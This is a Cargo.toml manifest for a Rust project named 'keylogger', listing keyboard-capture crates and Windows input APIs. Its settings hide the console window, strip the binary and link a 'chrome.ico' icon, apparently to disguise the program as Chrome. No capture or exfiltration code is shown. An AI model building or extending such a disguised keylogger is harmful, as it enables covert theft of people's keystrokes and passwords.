[package]
name = "keylogger"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
#windows = "0.44.0"
inputbot = "0.5"
device_query = "0.2.0"
chrono = "0.4"
base64 = "0.21.0"

[dependencies.windows]
version = "0.48"
features = [
    "Data_Xml_Dom",
    "Win32_Foundation",
    "Win32_Security",
    "Win32_System_Threading",
    "Win32_UI_WindowsAndMessaging",
    "Win32_UI_Input_KeyboardAndMouse",
    "Win32_UI_TextServices",
    "Win32_System_Console",
]

# https://github.com/johnthagen/min-sized-rust
[profile.release]
strip = true  # Automatically strip symbols from the binary.
opt-level = "z"  # Optimize for size.
lto = true
codegen-units = 1
panic = "abort"
incremental = false
debug = false
rpath = false
overflow-checks = true

[package.metadata.windows]
subsystem = "windows"

[build]
# the path to your .res file
rustflags = ["-C", "link-arg=chrome.ico"]
